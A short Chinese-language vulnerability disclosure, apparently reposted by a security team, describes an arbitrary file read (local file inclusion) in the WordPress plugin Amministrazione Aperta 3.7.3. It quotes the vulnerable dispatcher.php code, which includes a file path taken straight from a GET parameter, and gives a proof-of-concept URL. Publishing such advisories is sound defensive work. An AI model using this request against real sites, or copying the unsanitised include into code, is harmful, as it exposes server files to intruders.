WordPress Amministrazione Aperta 3.7.3 任意文件读取

Khan安全团队

发布于 2022-04-21 11:16:11

3610

发布于 2022-04-21 11:16:11

文章被收录于专栏：Khan安全团队

# 供应商主页：https://wordpress.org/plugins/amministrazione-aperta/

# 版本：3.7.3

# 测试：火狐

# 漏洞文件：dispatcher.php

# 漏洞代码：

```

if ( isset($_GET['open']) ) {
    include(ABSPATH . 'wp-content/plugins/'.$_GET['open']);
} else {
    echo '
        <div id="welcome-panel" class="welcome-panel"
style="padding-bottom: 20px;">
                <div class="welcome-panel-column-container">';

    include_once( ABSPATH . WPINC . '/feed.php' );

```

# 概念证明：

localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]

本文系转载，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

php